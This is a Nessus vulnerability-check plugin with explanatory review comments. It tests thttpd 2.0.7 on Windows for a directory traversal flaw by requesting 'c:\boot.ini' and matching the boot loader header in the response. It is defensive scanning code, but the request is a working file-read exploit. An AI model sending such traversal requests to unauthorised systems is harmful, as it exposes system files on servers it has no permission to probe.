nessusThis script is Copyright (C) 2004-2020 Tenable Network Security, Inc.THTTPD_DIRECTORY_TRAVERSAL.NASL
HistoryAug 09, 2004 - 12:00 a.m.

thttpd 2.0.7 Directory Traversal (Windows)

2004-08-0900:00:00
This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.
www.tenable.com
53

The remote web server fails to limit requests to items within the document directory. An attacker may exploit this flaw to read arbitrary files on the remote system with the privileges of the http process.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration block: runs only when the `description` variable is set.
# It records the plugin's identifiers, report text, scoring and scheduling
# requirements, then exits before any of the check code below is reached.
if (description)
{
 # Plugin ID and revision of this script.
 script_id(14229);
 script_version("1.23");

 # External references for the flaw this plugin reports.
 script_cve_id("CVE-2004-2628");
 script_bugtraq_id(10862);
 
 script_name(english:"thttpd 2.0.7 Directory Traversal (Windows)");
 
 # Report text attached to a finding.
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a path traversal attack." );
 script_set_attribute(attribute:"description", value:
"The remote web server fails to limit requests to items within the
document directory.  An attacker may exploit this flaw to read
arbitrary files on the remote system with the privileges of the http
process." );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2004/Aug/144");
 # NOTE(review): the solution text says no fix is known, while the temporal
 # vector below uses RL:OF (official fix available). One of the two looks
 # stale - confirm which before relying on either for remediation tracking.
 script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
 # CVSSv2 base: network reachable, low complexity, no authentication,
 # partial confidentiality impact only (a file read; no integrity or
 # availability impact is claimed).
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/08/09");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/08/04");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
# "remote" plugin type with "exploited_by_nessus" set: the check code in this
# file requests the file from the target rather than inferring the flaw from a
# version string.
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 
 script_summary(english:"thttpd traversal - try to read c:\boot.ini");
 
 # Registered in the information-gathering category.
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");
 # Declares http_version.nasl as a dependency and the web-service KB entry /
 # port 80 as the ports this plugin needs.
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 # Registration is complete; do not fall through into the check code.
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");

# Check logic: request c:\boot.ini from the web server and report a finding
# when the response body contains the "[boot loader]" section header.
#
# Detection caveats visible in this code:
#  - The match is made on body content alone. Neither the HTTP status code nor
#    the Server banner is examined, so any HTTP service that returns that file
#    is reported under this plugin, whatever product it is.
#  - The finding embeds everything returned after the response headers, so the
#    scan report will carry the contents of the file that was served.

# Pick the web port to test, defaulting to 80.
port = get_http_port(default:80, embedded:TRUE);

# Stop quietly when the port is not open or no connection can be made.
if (!get_port_state(port)) exit(0);

soc = http_open_socket(port);
if (!soc) exit(0);

# The requested item is a drive-letter path rather than a path under the
# document directory; a server that confines requests to its document
# directory should not return this file.
req = http_get(item:"c:\boot.ini", port:port);
send(socket:soc, data:req);
body = http_recv(socket:soc);

# When a header/body separator is present, keep only the text from the
# separator onwards so the headers are left out of the match and the report.
if ('\r\n\r\n' >< body)
  body = strstr(body, '\r\n\r\n');

# "[boot loader]" is the marker this check uses to recognise boot.ini content.
if (egrep(pattern:"\[boot loader\]", string:body))
{
  report = string("\n",
                  "Requesting the file c:\\boot.ini returns :\n",
                  "\n",
                  body, "\n");
  security_warning(port:port, extra:report);
}

http_close_socket(soc);
